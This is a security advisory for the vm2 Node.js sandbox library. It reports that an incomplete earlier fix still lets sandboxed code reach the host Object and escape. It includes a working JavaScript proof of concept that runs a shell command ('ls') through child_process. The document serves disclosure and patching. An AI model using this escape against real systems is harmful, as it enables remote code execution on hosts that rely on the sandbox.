GHSA-47x8-96vw-5wg6
vm2 Access to Host Object Enables Sandbox Escape
Details
### Summary
It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.
### Details
There are various ways to use the host `Object`, to escape the sandbox, one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`
### PoC
```js const g = {}.__lookupGetter__; const a = Buffer.apply; const p = a.apply(g, [Buffer, ['__proto__']]); const o = p.call(p.call(a)); const HObject = o.constructor; sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
const obj = { [sym]: (depth, opt, inspect) => { inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")(); }, valueOf: undefined, constructor: undefined, };
WebAssembly.compileStreaming(obj).catch(() => {}); ```
### Impact
Sandbox Escape -> RCE
Are you affected?
Enter the version of the package you're using.